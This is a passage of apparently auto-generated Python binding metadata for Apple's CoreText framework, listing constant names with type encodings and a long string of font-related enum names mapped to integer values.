StrokeWidthAttributeName@^{__CFString=}$kCTSuperscriptAttributeName@^{__CFString=}$kCTTabColumnTerminatorsAttributeName@^{__CFString=}$kCTTrackingAttributeName@^{__CFString=}$kCTTypesetterOptionAllowUnboundedLayout@^{__CFString=}$kCTTypesetterOptionDisableBidiProcessing@^{__CFString=}$kCTTypesetterOptionForcedEmbeddingLevel@^{__CFString=}$kCTUnderlineColorAttributeName@^{__CFString=}$kCTUnderlineStyleAttributeName@^{__CFString=}$kCTVerticalFormsAttributeName@^{__CFString=}$kCTWritingDirectionAttributeName@^{__CFString=}$''' enums = 
'''$cmapFontTableTag@1668112752$descriptorFontTableTag@1717859171$featureFontTableTag@1717920116$kANKRCurrentVersion@0$kAbbrevSquaredLigaturesOffSelector@15$kAbbrevSquaredLigaturesOnSelector@14$kAllCapsSelector@1$kAllLowerCaseSelector@2$kAllTypeFeaturesOffSelector@1$kAllTypeFeaturesOnSelector@0$kAllTypographicFeaturesType@0$kAltHalfWidthTextSelector@6$kAltProportionalTextSelector@5$kAlternateHorizKanaOffSelector@1$kAlternateHorizKanaOnSelector@0$kAlternateKanaType@34$kAlternateVertKanaOffSelector@3$kAlternateVertKanaOnSelector@2$kAnnotationType@24$kAsteriskToMultiplyOffSelector@3$kAsteriskToMultiplyOnSelector@2$kBSLNControlPointFormatNoMap@2$kBSLNControlPointFormatWithMap@3$kBSLNCurrentVersion@65536$kBSLNDistanceFormatNoMap@0$kBSLNDistanceFormatWithMap@1$kBSLNHangingBaseline@3$kBSLNIdeographicCenterBaseline@1$kBSLNIdeographicHighBaseline@5$kBSLNIdeographicLowBaseline@2$kBSLNLastBaseline@31$kBSLNMathBaseline@4$kBSLNNoBaseline@255$kBSLNNoBaselineOverride@255$kBSLNNumBaselineClasses@32$kBSLNRomanBaseline@0$kBSLNTag@1651731566$kBoxAnnotationSelector@1$kCJKItalicRomanOffSelector@3$kCJKItalicRomanOnSelector@2$kCJKItalicRomanSelector@1$kCJKRomanSpacingType@103$kCJKSymbolAltFiveSelector@5$kCJKSymbolAltFourSelector@4$kCJKSymbolAltOneSelector@1$kCJKSymbolAltThreeSelector@3$kCJKSymbolAltTwoSelector@2$kCJKSymbolAlternativesType@29$kCJKVerticalRomanCenteredSelector@0$kCJKVerticalRomanHBaselineSelector@1$kCJKVerticalRomanPlacementType@31$kCTAdobeCNS1CharacterCollection@1$kCTAdobeGB1CharacterCollection@2$kCTAdobeJapan1CharacterCollection@3$kCTAdobeJapan2CharacterCollection@4$kCTAdobeKorea1CharacterCollection@5$kCTCenterTextAlignment@2$kCTCharacterCollectionAdobeCNS1@1$kCTCharacterCollectionAdobeGB1@2$kCTCharacterCollectionAdobeJapan1@3$kCTCharacterCollectionAdobeJapan2@4$kCTCharacterCollectionAdobeKorea1@5$kCTCharacterCollectionIdentityMapping@0$kCTFontAlertHeaderFontType@18$kCTFontApplicationFontType@9$kCTFontBoldTrait@2$kCTFontClarendonSerifsClass@1073741824$kCTFontClassClarendonSerifs@1073741824$kCTFontClassFreeformSerifs@1879048192$kCTFontClassMaskShift@28$kCTFontClassMaskTrait@4026531840$kCTFontClassModernSerifs@805306368$kCTFontClassOldStyleSerifs@268435456$kCTFontClassOrnamentals@2415919104$kCTFontClassSansSerif@2147483648$kCTFontClassScripts@2684354560$kCTFontClassSlabSerifs@1342177280$kCTFontClassSymbolic@3221225472$kCTFontClassTransitionalSerifs@536870912$kCTFontClassUnknown@0$kCTFontCollectionCopyDefaultOptions@0$kCTFontCollectionCopyStandardSort@2$kCTFontCollectionCopyUnique@1$kCTFontColorGlyphsTrait@8192$kCTFontCompositeTrait@16384$kCTFontCondensedTrait@64$kCTFontControlContentFontType@26$kCTFontDefaultOrientation@0$kCTFontDescriptorMatchingDidBegin@0$kCTFontDescriptorMatchingDidFailWithError@8$kCTFontDescriptorMatchingDidFinish@1$kCTFontDescriptorMatchingDidFinishDownloading@6$kCTFontDescriptorMatchingDidMatch@7$kCTFontDescriptorMatchingDownloading@5$kCTFontDescriptorMatchingStalled@3$kCTFontDescriptorMatchingWillBeginDownloading@4$kCTFontDescriptorMatchingWillBeginQuerying@2$kCTFontEmphasizedSystemDetailFontType@20$kCTFontEmphasizedSystemFontType@3$kCTFontExpandedTrait@32$kCTFontFormatBitmap@5$kCTFontFormatOpenTypePostScript@1$kCTFontFormatOpenTypeTrueType@2$kCTFontFormatPostScript@4$kCTFontFormatTrueType@3$kCTFontFormatUnrecognized@0$kCTFontFreeformSerifsClass@1879048192$kCTFontHorizontalOrientation@1$kCTFontItalicTrait@1$kCTFontLabelFontType@10$kCTFontManagerAutoActivationDefault@0$kCTFontManagerAutoActivationDisabled@1$kCTFontManagerAutoActivationEnabled@2$kCTFontManagerAutoActivationPro
mptUser@3$kCTFontManagerErrorAlreadyRegistered@105$kCTFontManagerErrorCancelledByUser@304$kCTFontManagerErrorDuplicatedName@305$kCTFontManagerErrorExceededResourceLimit@106$kCTFontManagerErrorFileNotFound@101$kCTFontManagerErrorInUse@202$kCTFontManagerErrorInsufficientInfo@303$kCTFontManagerErrorInsufficientPermissions@102$kCTFontManagerErrorInvalidFilePath@306$kCTFontManagerErrorInvalidFontData@104$kCTFontManagerErrorMissingEntitlement@302$kCTFontManagerErrorNotRegistered@201$kCTFontManagerErrorRegistrationFailed@301$kCTFontManagerErrorSystemRequired@203$kCTFontManagerErrorUnrecognizedFormat@103$kCTFontManagerScopeNone@0$kCTFontManagerScopePersistent@2$kCTFontManagerScopeProcess@1$kCTFontManagerScopeSession@3$kCTFontManagerScopeUser@2$kCTFontMenuItemCmdKeyFontType@14$kCTFontMenuItemFontType@12$kCTFontMenuItemMarkFontType@13$kCTFontMenuTitleFontType@11$kCTFontMessageFontType@23$kCTFontMiniEmphasizedSystemFontType@7$kCTFontMiniSystemFontType@6$kCTFontModernSerifsClass@805306368$kCTFontMonoSpaceTrait@1024$kCTFontNoFontType@4294967295$kCTFontOldStyleSerifsClass@268435456$kCTFontOptionsDefault@0$kCTFontOptionsPreferSystemFont@4$kCTFontOptionsPreventAutoActivation@1$kCTFontOrientationDefault@0$kCTFontOrientationHorizontal@1$kCTFontOrientationVertical@2$kCTFontOrnamentalsClass@2415919104$kCTFontPaletteFontType@24$kCTFontPriorityComputer@30000$kCTFontPriorityDynamic@50000$kCTFontPriorityNetwork@20000$kCTFontPriorityProcess@60000$kCTFontPrioritySystem@10000$kCTFontPriorityUser@40000$kCTFontPushButtonFontType@16$kCTFontSansSerifClass@2147483648$kCTFontScriptsClass@2684354560$kCTFontSlabSerifsClass@1342177280$kCTFontSmallEmphasizedSystemFontType@5$kCTFontSmallSystemFontType@4$kCTFontSmallToolbarFontType@22$kCTFontSymbolicClass@3221225472$kCTFontSystemDetailFontType@19$kCTFontSystemFontType@2$kCTFontTableAcnt@1633906292$kCTFontTableAnkr@1634626418$kCTFontTableAvar@1635148146$kCTFontTableBASE@1111577413$kCTFontTableBdat@1650745716$kCTFontTableBhed@1651008868$kCTFontTableBloc@1651273571$kCTFontTableBsln@1651731566$kCTFontTableCBDT@1128416340$kCTFontTableCBLC@1128418371$kCTFontTableCFF@1128678944$kCTFontTableCFF2@1128678962$kCTFontTableCOLR@1129270354$kCTFontTableCPAL@1129333068$kCTFontTableCidg@1667851367$kCTFontTableCmap@1668112752$kCTFontTableCvar@1668702578$kCTFontTableCvt@1668707360$kCTFontTableDSIG@1146308935$kCTFontTableEBDT@1161970772$kCTFontTableEBLC@1161972803$kCTFontTableEBSC@1161974595$kCTFontTableFdsc@1717859171$kCTFontTableFeat@1717920116$kCTFontTableFmtx@1718449272$kCTFontTableFond@1718578788$kCTFontTableFpgm@1718642541$kCTFontTableFvar@1719034226$kCTFontTableGDEF@1195656518$kCTFontTableGPOS@1196445523$kCTFontTableGSUB@1196643650$kCTFontTableGasp@1734439792$kCTFontTableGlyf@1735162214$kCTFontTableGvar@1735811442$kCTFontTableHVAR@1213612370$kCTFontTableHdmx@1751412088$kCTFontTableHead@1751474532$kCTFontTableHhea@1751672161$kCTFontTableHmtx@1752003704$kCTFontTableHsty@1752396921$kCTFontTableJSTF@1246975046$kCTFontTableJust@1786082164$kCTFontTableKern@1801810542$kCTFontTableKerx@1801810552$kCTFontTableLTSH@1280594760$kCTFontTableLcar@1818452338$kCTFontTableLoca@1819239265$kCTFontTableLtag@1819566439$kCTFontTableMATH@1296127048$kCTFontTableMERG@1296388679$kCTFontTableMVAR@1297498450$kCTFontTableMaxp@1835104368$kCTFontTableMeta@1835365473$kCTFontTableMort@1836020340$kCTFontTableMorx@1836020344$kCTFontTableName@1851878757$kCTFontTableOS2@1330851634$kCTFontTableOpbd@1869636196$kCTFontTableOptionExcludeSynthetic@1$kCTFontTableOptionNoOptions@0$kCTFontTablePCLT@1346587732$kCTFontTablePost@188635224
4$kCTFontTablePrep@1886545264$kCTFontTableProp@1886547824$kCTFontTableSTAT@1398030676$kCTFontTableSVG@1398163232$kCTFontTableSbit@1935829364$kCTFontTableSbix@1935829368$kCTFontTableTrak@1953653099$kCTFontTableVDMX@1447316824$kCTFontTableVORG@1448038983$kCTFontTableVVAR@1448493394$kCTFontTableVhea@1986553185$kCTFontTableVmtx@1986884728$kCTFontTableXref@2020762982$kCTFontTableZapf@1516335206$kCTFontToolTipFontType@25$kCTFontToolbarFontType@21$kCTFontTraitBold@2$kCTFontTraitClassMask@4026531840$kCTFontTraitColorGlyphs@8192$kCTFontTraitComposite@16384$kCTFontTraitCondensed@64$kCTFontTraitExpanded@32$kCTFontTraitItalic@1$kCTFontTraitMonoSpace@1024$kCTFontTraitUIOptimized@4096$kCTFontTraitVertical@2048$kCTFontTransitionalSerifsClass@536870912$kCTFontUIFontAlertHeader@18$kCTFontUIFontApplication@9$kCTFontUIFontControlContent@26$kCTFontUIFontEmphasizedSystem@3$kCTFontUIFontEmphasizedSystemDetail@20$kCTFontUIFontLabel@10$kCTFontUIFontMenuItem@12$kCTFontUIFontMenuItemCmdKey@14$kCTFontUIFontMenuItemMark@13$kCTFontUIFontMenuTitle@11$kCTFontUIFontMessage@23$kCTFontUIFontMiniEmphasizedSystem@7$kCTFontUIFontMiniSystem@6$kCTFontUIFontNone@4294967295$kCTFontUIFontPalette@24$kCTFontUIFontPushButton@16$kCTFontUIFontSmallEmphasizedSystem@5$kCTFontUIFontSmallSystem@4$kCTFontUIFontSmallToolbar@22$kCTFontUIFontSystem@2$kCTFontUIFontSystemDetail@19$kCTFontUIFontToolTip@25$kCTFontUIFontToolbar@21$kCTFontUIFontUser@0$kCTFontUIFontUserFixedPitch@1$kCTFontUIFontUtilityWindowTitle@17$kCTFontUIFontViews@8$kCTFontUIFontWindowTitle@15$kCTFontUIOptimizedTrait@4096$kCTFontUnknownClass@0$kCTFontUserFixedPitchFontType@1$kCTFontUserFontType@0$kCTFontUtilityWindowTitleFontType@17$kCTFontVerticalOrientation@2$kCTFontVerticalTrait@2048$kCTFontViewsFontType@8$kCTFontWindowTitleFontType@15$kCTFramePathFillEvenOdd@0$kCTFramePathFillWindingNumber@1$kCTFrameProgressionLeftToRight@2$kCTFrameProgressionRightToLeft@1$kCTFrameProgressionTopToBottom@0$kCTIdentityMappingCharacterCollection@0$kCTJustifiedTextAlignment@3$kCTLeftTextAlignment@0$kCTLineBoundsExcludeTypographicLeading@1$kCTLineBoundsExcludeTypographicShifts@2$kCTLineBoundsIncludeLanguageExtents@32$kCTLineBoundsUseGlyphPathBounds@8$kCTLineBoundsUseHangingPunctuation@4$kCTLineBoundsUseOpticalBounds@16$kCTLineBreakByCharWrapping@1$kCTLineBreakByClipping@2$kCTLineBreakByTruncatingHead@3$kCTLineBreakByTruncatingMiddle@5$kCTLineBreakByTruncatingTail@4$kCTLineBreakByWordWrapping@0$kCTLineTruncationEnd@1$kCTLineTruncationMiddle@2$kCTLineTruncationStart@0$kCTNaturalTextAlignment@4$kCTParagraphStyleSpecifierAlignment@0$kCTParagraphStyleSpecifierBaseWritingDirection@13$kCTParagraphStyleSpecifierCount@18$kCTParagraphStyleSpecifierDefaultTabInterval@5$kCTParagraphStyleSpecifierFirstLineHeadIndent@1$kCTParagraphStyleSpecifierHeadIndent@2$kCTParagraphStyleSpecifierLineBoundsOptions@17$kCTParagraphStyleSpecifierLineBreakMode@6$kCTParagraphStyleSpecifierLineHeightMultiple@7$kCTParagraphStyleSpecifierLineSpacing@10$kCTParagraphStyleSpecifierLineSpacingAdjustment@16$kCTParagraphStyleSpecifierMaximumLineHeight@8$kCTParagraphStyleSpecifierMaximumLineSpacing@14$kCTParagraphStyleSpecifierMinimumLineHeight@9$kCTParagraphStyleSpecifierMinimumLineSpacing@15$kCTParagraphStyleSpecifierParagraphSpacing@11$kCTParagraphStyleSpecifierParagraphSpacingBefore@12$kCTParagraphStyleSpecifierTabStops@4$kCTParagraphStyleSpecifierTailIndent@3$kCTRightTextAlignment@1$kCTRubyAlignmentAuto@0$kCTRubyAlignmentCenter@2$kCTRubyAlignmentDistributeLetter@4$kCTRubyAlignmentDistributeSpace@5$kCTRubyAlignmentEnd@3$kCTRubyAlignment
Invalid@255$kCTRubyAlignmentLineEdge@6$kCTRubyAlignmentStart@1$kCTRubyOverhangAuto@0$kCTRubyOverhangEnd@2$kCTRubyOverhangInvalid@255$kCTRubyOverhangNone@3$kCTRubyOverhangStart@1$kCTRubyPositionAfter@1$kCTRubyPositionBefore@0$kCTRubyPositionCount@4$kCTRubyPositionInline@3$kCTRubyPositionInterCharacter@2$kCTRunDelegateCurrentVersion@1$kCTRunDelegateVersion1@1$kCTRunStatusHasNonIdentityMatrix@4$kCTRunStatusNoStatus@0$kCTRunStatusNonMonotonic@2$kCTRunStatusRightToLeft@1$kCTTextAlignmentCenter@2$kCTTextAlignmentJustified@3$kCTTextAlignmentLeft@0$kCTTextAlignmentNatural@4$kCTTextAlignmentRight@1$kCTUnderlinePatternDash@512$kCTUnderlinePatternDashDot@768$kCTUnderlinePatternDashDotDot@1024$kCTUnderlinePatternDot@256$kCTUnderlinePatternSolid@0$kCTUnderlineStyleDouble@9$kCTUnderlineStyleNone@0$kCTUnderlineStyleSingle@1$kCTUnderlineStyleThick@2$kCTVersionNumber10_10@458752$kCTVersionNumber10_11@524288$kCTVersionNumber10_12@589824$kCTVersionNumber10_13@655360$kCTVersionNumber10_14@720896$kCTVersionNumber10_15@786432$kCTVersionNumber10_5@131072$kCTVersionNumber10_5_2@131073$kCTVersionNumber10_5_3@131074$kCTVersionNumber10_5_5@131075$kCTVersionNumber10_6@196608$kCTVersionNumber10_6_7@196615$kCTVersionNumber10_7@262144$kCTVersionNumber10_8@327680$kCTVersionNumber10_9@393216$kCTWritingDirectionEmbedding@0$kCTWritingDirectionLeftToRight@0$kCTWritingDirectionNatural@-1$kCTWritingDirectionOverride@2$kCTWritingDirectionRightToLeft@1$kCanonicalCompositionOffSelector@1$kCanonicalCompositionOnSelector@0$kCaseSensitiveLayoutOffSelector@1$kCaseSensitiveLayoutOnSelector@0$kCaseSensitiveLayoutType@33$kCaseSensitiveSpacingOffSelector@3$kCaseSensitiveSpacingOnSelector@2$kCharacterAlternativesType@17$kCharacterShapeType@20$kCircleAnnotationSelector@3$kCommonLigaturesOffSelector@3$kCommonLigaturesOnSelector@2$kCompatibilityCompositionOffSelector@3$kCompatibilityCompositionOnSelector@2$kContextualAlternatesOffSelector@1$kContextualAlternatesOnSelector@0$kContextualAlternatesType@36$kContextualLigaturesOffSelector@19$kContextualLigaturesOnSelector@18$kContextualSwashAlternatesOffSelector@5$kContextualSwashAlternatesOnSelector@4$kCursiveConnectionType@2$kCursiveSelector@2$kDecomposeDiacriticsSelector@2$kDecorativeBordersSelector@4$kDefaultCJKRomanSelector@2$kDefaultLowerCaseSelector@0$kDefaultUpperCaseSelector@0$kDesignComplexityType@18$kDesignLevel1Selector@0$kDesignLevel2Selector@1$kDesignLevel3Selector@2$kDesignLevel4Selector@3$kDesignLevel5Selector@4$kDiacriticsType@9$kDiagonalFractionsSelector@2$kDiamondAnnotationSelector@8$kDingbatsSelector@1$kDiphthongLigaturesOffSelector@11$kDiphthongLigaturesOnSelector@10$kDisplayTextSelector@1$kEngravedTextSelector@2$kExpertCharactersSelector@10$kExponentsOffSelector@9$kExponentsOnSelector@8$kFleuronsSelector@3$kFontAlbanianLanguage@36$kFontAmharicLanguage@85$kFontAmharicScript@28$kFontArabicLanguage@12$kFontArabicScript@4$kFontArmenianLanguage@51$kFontArmenianScript@24$kFontAssameseLanguage@68$kFontAymaraLanguage@134$kFontAzerbaijanArLanguage@50$kFontAzerbaijaniLanguage@49$kFontBasqueLanguage@129$kFontBengaliLanguage@67$kFontBengaliScript@13$kFontBulgarianLanguage@44$kFontBurmeseLanguage@77$kFontBurmeseScript@19$kFontByelorussianLanguage@46$kFontCatalanLanguage@130$kFontChewaLanguage@92$kFontChineseScript@2$kFontCopyrightName@0$kFontCroatianLanguage@18$kFontCustom16BitScript@2$kFontCustom816BitScript@1$kFontCustom8BitScript@0$kFontCustomPlatform@4$kFontCyrillicScript@7$kFontCzechLanguage@38$kFontDanishLanguage@7$kFontDescriptionName@10$kFontDesignerName@9$kFontDesignerURLName@12$
kFontDevanagariScript@9$kFontDutchLanguage@4$kFontDzongkhaLanguage@137$kFontEastEuropeanRomanScript@29$kFontEnglishLanguage@0$kFontEsperantoLanguage@94$kFontEstonianLanguage@27$kFontEthiopicScript@28$kFontExtendedArabicScript@31$kFontFaeroeseLanguage@30$kFontFamilyName@1$kFontFarsiLanguage@31$kFontFinnishLanguage@13$kFontFlemishLanguage@34$kFontFrenchLanguage@1$kFontFullName@4$kFontGallaLanguage@87$kFontGeezScript@28$kFontGeorgianLanguage@52$kFontGeorgianScript@23$kFontGermanLanguage@2$kFontGreekLanguage@14$kFontGreekScript@6$kFontGuaraniLanguage@133$kFontGujaratiLanguage@69$kFontGujaratiScript@11$kFontGurmukhiScript@10$kFontHebrewLanguage@10$kFontHebrewScript@5$kFontHindiLanguage@21$kFontHungarianLanguage@26$kFontISO10646_1993Semantics@2$kFontIcelandicLanguage@15$kFontIndonesianLanguage@81$kFontIrishLanguage@35$kFontItalianLanguage@3$kFontJapaneseLanguage@11$kFontJapaneseScript@1$kFontJavaneseRomLanguage@138$kFontKannadaLanguage@73$kFontKannadaScript@16$kFontKashmiriLanguage@61$kFontKazakhLanguage@48$kFontKhmerLanguage@78$kFontKhmerScript@20$kFontKirghizLanguage@54$kFontKoreanLanguage@23$kFontKoreanScript@3$kFontKurdishLanguage@60$kFontLaoLanguage@79$kFontLaotianScript@22$kFontLappishLanguage@29$kFontLastReservedName@255$kFontLatinLanguage@131$kFontLatvianLanguage@28$kFontLettishLanguage@28$kFontLicenseDescriptionName@13$kFontLicenseInfoURLName@14$kFontLithuanianLanguage@24$kFontMacCompatibleFullName@18$kFontMacedonianLanguage@43$kFontMacintoshPlatform@1$kFontMalagasyLanguage@93$kFontMalayArabicLanguage@84$kFontMalayRomanLanguage@83$kFontMalayalamLanguage@72$kFontMalayalamScript@17$kFontMalteseLanguage@16$kFontManufacturerName@8$kFontMarathiLanguage@66$kFontMicrosoftPlatform@3$kFontMicrosoftStandardScript@1$kFontMicrosoftSymbolScript@0$kFontMicrosoftUCS4Script@10$kFontMoldavianLanguage@53$kFontMongolianCyrLanguage@58$kFontMongolianLanguage@57$kFontMongolianScript@27$kFontNepaliLanguage@64$kFontNoLanguageCode@4294967295$kFontNoNameCode@4294967295$kFontNoPlatformCode@4294967295$kFontNoScriptCode@4294967295$kFontNorwegianLanguage@9$kFontOriyaLanguage@71$kFontOriyaScript@12$kFontOromoLanguage@87$kFontPashtoLanguage@59$kFontPersianLanguage@31$kFontPolishLanguage@25$kFontPortugueseLanguage@8$kFontPostScriptCIDName@20$kFontPostscriptName@6$kFontPreferredFamilyName@16$kFontPreferredSubfamilyName@17$kFontPunjabiLanguage@70$kFontQuechuaLanguage@132$kFontRSymbolScript@8$kFontReservedPlatform@2$kFontRomanScript@0$kFontRomanianLanguage@37$kFontRuandaLanguage@90$kFontRundiLanguage@91$kFontRussian@7$kFontRussianLanguage@32$kFontSaamiskLanguage@29$kFontSampleTextName@19$kFontSanskritLanguage@65$kFontSerbianLanguage@42$kFontSimpChineseLanguage@33$kFontSimpleChineseScript@25$kFontSindhiLanguage@62$kFontSindhiScript@31$kFontSinhaleseLanguage@76$kFontSinhaleseScript@18$kFontSlavicScript@29$kFontSlovakLanguage@39$kFontSlovenianLanguage@40$kFontSomaliLanguage@88$kFontSpanishLanguage@6$kFontStyleName@2$kFontSundaneseRomLanguage@139$kFontSwahiliLanguage@89$kFontSwedishLanguage@5$kFontTagalogLanguage@82$kFontTajikiLanguage@55$kFontTamilLanguage@74$kFontTamilScript@14$kFontTatarLanguage@135$kFontTeluguLanguage@75$kFontTeluguScript@15$kFontThaiLanguage@22$kFontThaiScript@21$kFontTibetanLanguage@63$kFontTibetanScript@26$kFontTigrinyaLanguage@86$kFontTradChineseLanguage@19$kFontTrademarkName@7$kFontTraditionalChineseScript@2$kFontTurkishLanguage@17$kFontTurkmenLanguage@56$kFontUighurLanguage@136$kFontUkrainianLanguage@45$kFontUnicodeDefaultSemantics@0$kFontUnicodePlatform@0$kFontUnicodeV1_1Semantics@1$kFontUnicodeV2_0
BMPOnlySemantics@3$kFontUnicodeV2_0FullCoverageSemantics@4$kFontUnicodeV4_0VariationSequenceSemantics@5$kFontUnicode_FullRepertoire@6$kFontUninterpretedScript@32$kFontUniqueName@3$kFontUrduLanguage@20$kFontUzbekLanguage@47$kFontVendorURLName@11$kFontVersionName@5$kFontVietnameseLanguage@80$kFontVietnameseScript@30$kFontWelshLanguage@128$kFontYiddishLanguage@41$kFormInterrobangOffSelector@7$kFormInterrobangOnSelector@6$kFractionsType@11$kFullWidthCJKRomanSelector@3$kFullWidthIdeographsSelector@0$kFullWidthKanaSelector@0$kHalfWidthCJKRomanSelector@0$kHalfWidthIdeographsSelector@2$kHalfWidthTextSelector@2$kHanjaToHangulAltOneSelector@7$kHanjaToHangulAltThreeSelector@9$kHanjaToHangulAltTwoSelector@8$kHanjaToHangulSelector@1$kHideDiacriticsSelector@1$kHiraganaToKatakanaSelector@2$kHistoricalLigaturesOffSelector@21$kHistoricalLigaturesOnSelector@20$kHojoCharactersSelector@12$kHyphenToEnDashOffSelector@3$kHyphenToEnDashOnSelector@2$kHyphenToMinusOffSelector@1$kHyphenToMinusOnSelector@0$kHyphensToEmDashOffSelector@1$kHyphensToEmDashOnSelector@0$kIdeographicAltFiveSelector@5$kIdeographicAltFourSelector@4$kIdeographicAltOneSelector@1$kIdeographicAltThreeSelector@3$kIdeographicAltTwoSelector@2$kIdeographicAlternativesType@30$kIdeographicSpacingType@26$kIlluminatedCapsSelector@3$kInequalityLigaturesOffSelector@7$kInequalityLigaturesOnSelector@6$kInferiorsSelector@2$kInitialCapsAndSmallCapsSelector@5$kInitialCapsSelector@4$kInternationalSymbolsSelector@5$kInvertedBoxAnnotationSelector@9$kInvertedCircleAnnotationSelector@4$kInvertedRoundedBoxAnnotationSelector@10$kItalicCJKRomanType@32$kJIS1978CharactersSelector@2$kJIS1983CharactersSelector@3$kJIS1990CharactersSelector@4$kJIS2004CharactersSelector@11$kJUSTCurrentVersion@65536$kJUSTKashidaPriority@0$kJUSTLetterPriority@2$kJUSTNullPriority@3$kJUSTOverrideLimits@16384$kJUSTOverridePriority@32768$kJUSTOverrideUnlimited@8192$kJUSTPriorityCount@4$kJUSTPriorityMask@3$kJUSTSpacePriority@1$kJUSTStandardFormat@0$kJUSTTag@1786082164$kJUSTUnlimited@4096$kJUSTnoGlyphcode@65535$kJUSTpcConditionalAddAction@2$kJUSTpcDecompositionAction@0$kJUSTpcDuctilityAction@4$kJUSTpcGlyphRepeatAddAction@5$kJUSTpcGlyphStretchAction@3$kJUSTpcUnconditionalAddAction@1$kKERNCrossStream@16384$kKERNCrossStreamResetNote@2$kKERNCurrentVersion@65536$kKERNFormatMask@255$kKERNIndexArray@3$kKERNLineEndKerning@2$kKERNLineStart@1$kKERNNoCrossKerning@4$kKERNNoStakeNote@1$kKERNNotApplied@1$kKERNNotesRequested@8$kKERNOrderedList@0$kKERNResetCrossStream@32768$kKERNSimpleArray@2$kKERNStateTable@1$kKERNTag@1801810542$kKERNUnusedBits@7936$kKERNVariation@8192$kKERNVertical@32768$kKERXActionOffsetMask@16777215$kKERXActionTypeAnchorPoints@1073741824$kKERXActionTypeControlPoints@0$kKERXActionTypeCoordinates@2147483648$kKERXActionTypeMask@3221225472$kKERXControlPoint@4$kKERXCrossStream@1073741824$kKERXCrossStreamResetNote@2$kKERXCurrentVersion@131072$kKERXDescending@268435456$kKERXFormatMask@255$kKERXLineEndKerning@2$kKERXLineStart@1$kKERXNoCrossKerning@4$kKERXNoStakeNote@1$kKERXNotApplied@1$kKERXNotesRequested@8$kKERXOrderedList@0$kKERXResetCrossStream@32768$kKERXSimpleArray@2$kKERXStateTable@1$kKERXTag@1801810552$kKERXUnusedBits@268435200$kKERXUnusedFlags@1056964608$kKERXValuesAreLong@1$kKERXVariation@536870912$kKERXVertical@-2147483648$kKanaSpacingType@25$kKanaToRomanizationSelector@4$kKatakanaToHiraganaSelector@3$kLCARCtlPointFormat@1$kLCARCurrentVersion@65536$kLCARLinearFormat@0$kLCARTag@1818452338$kLTAGCurrentVersion@1$kLanguageTagType@39$kLastFeatureType@-1$kLetterCaseType@3$kLigaturesType@1$kLineFinalS
washesOffSelector@7$kLineFinalSwashesOnSelector@6$kLineInitialSwashesOffSelector@5$kLineInitialSwashesOnSelector@4$kLinguisticRearrangementOffSelector@1$kLinguisticRearrangementOnSelector@0$kLinguisticRearrangementType@5$kLogosOffSelector@7$kLogosOnSelector@6$kLowerCaseNumbersSelector@0$kLowerCasePetiteCapsSelector@2$kLowerCaseSmallCapsSelector@1$kLowerCaseType@37$kMORTContextualType@1$kMORTCoverDescending@16384$kMORTCoverIgnoreVertical@8192$kMORTCoverTypeMask@15$kMORTCoverVertical@32768$kMORTCurrInsertBefore@2048$kMORTCurrInsertCountMask@992$kMORTCurrInsertCountShift@5$kMORTCurrInsertKashidaLike@8192$kMORTCurrJustTableCountMask@127$kMORTCurrJustTableCountShift@0$kMORTCurrentVersion@65536$kMORTDoInsertionsBefore@128$kMORTInsertionType@5$kMORTInsertionsCountMask@63$kMORTIsSplitVowelPiece@64$kMORTLigFormOffsetMask@1073741823$kMORTLigFormOffsetShift@2$kMORTLigLastAction@-2147483648$kMORTLigStoreLigature@1073741824$kMORTLigatureType@2$kMORTMarkInsertBefore@1024$kMORTMarkInsertCountMask@31$kMORTMarkInsertCountShift@0$kMORTMarkInsertKashidaLike@4096$kMORTMarkJustTableCountMask@16256$kMORTMarkJustTableCountShift@7$kMORTRearrangementType@0$kMORTSwashType@4$kMORTTag@1836020340$kMORTraCDx@6$kMORTraCDxA@8$kMORTraCDxAB@12$kMORTraCDxBA@13$kMORTraDCx@7$kMORTraDCxA@9$kMORTraDCxAB@14$kMORTraDCxBA@15$kMORTraDx@2$kMORTraDxA@3$kMORTraDxAB@10$kMORTraDxBA@11$kMORTraNoAction@0$kMORTraxA@1$kMORTraxAB@4$kMORTraxBA@5$kMORXCoverDescending@1073741824$kMORXCoverIgnoreVertical@536870912$kMORXCoverLogicalOrder@268435456$kMORXCoverTypeMask@255$kMORXCoverVertical@-2147483648$kMORXCurrentVersion@131072$kMORXTag@1836020344$kMathSymbolsSelector@6$kMathematicalExtrasType@15$kMathematicalGreekOffSelector@11$kMathematicalGreekOnSelector@10$kMonospacedNumbersSelector@0$kMonospacedTextSelector@1$kNLCCharactersSelector@13$kNoAlternatesSelector@0$kNoAnnotationSelector@0$kNoCJKItalicRomanSelector@0$kNoCJKSymbolAlternativesSelector@0$kNoFractionsSelector@0$kNoIdeographicAlternativesSelector@0$kNoOrnamentsSelector@0$kNoRubyKanaSelector@0$kNoStyleOptionsSelector@0$kNoStylisticAlternatesSelector@0$kNoTransliterationSelector@0$kNonFinalSwashesOffSelector@9$kNonFinalSwashesOnSelector@8$kNormalPositionSelector@0$kNumberCaseType@21$kNumberSpacingType@6$kOPBDControlPointFormat@1$kOPBDCurrentVersion@65536$kOPBDDistanceFormat@0$kOPBDTag@1869636196$kOrdinalsSelector@3$kOrnamentSetsType@16$kOverlappingCharactersType@13$kPROPALDirectionClass@2$kPROPANDirectionClass@6$kPROPBNDirectionClass@19$kPROPCSDirectionClass@7$kPROPCanHangLTMask@16384$kPROPCanHangRBMask@8192$kPROPCurrentVersion@196608$kPROPDirectionMask@31$kPROPENDirectionClass@3$kPROPESDirectionClass@4$kPROPETDirectionClass@5$kPROPIsFloaterMask@32768$kPROPLDirectionClass@0$kPROPLREDirectionClass@13$kPROPLRODirectionClass@14$kPROPNSMDirectionClass@18$kPROPNumDirectionClasses@20$kPROPONDirectionClass@11$kPROPPDFDirectionClass@17$kPROPPSDirectionClass@8$kPROPPairOffsetMask@3840$kPROPPairOffsetShift@8$kPROPPairOffsetSign@7$kPROPRDirectionClass@1$kPROPRLEDirectionClass@15$kPROPRLODirectionClass@16$kPROPRightConnectMask@128$kPROPSDirectionClass@9$kPROPSENDirectionClass@12$kPROPTag@1886547824$kPROPUseRLPairMask@4096$kPROPWSDirectionClass@10$kPROPZeroReserved@96$kParenthesisAnnotationSelector@5$kPartiallyConnectedSelector@1$kPeriodAnnotationSelector@6$kPeriodsToEllipsisOffSelector@11$kPeriodsToEllipsisOnSelector@10$kPiCharactersSelector@2$kPreventOverlapOffSelector@1$kPreventOverlapOnSelector@0$kProportionalCJKRomanSelector@1$kProportionalIdeographsSelector@1$kProportionalKanaSelector@1$kProportion
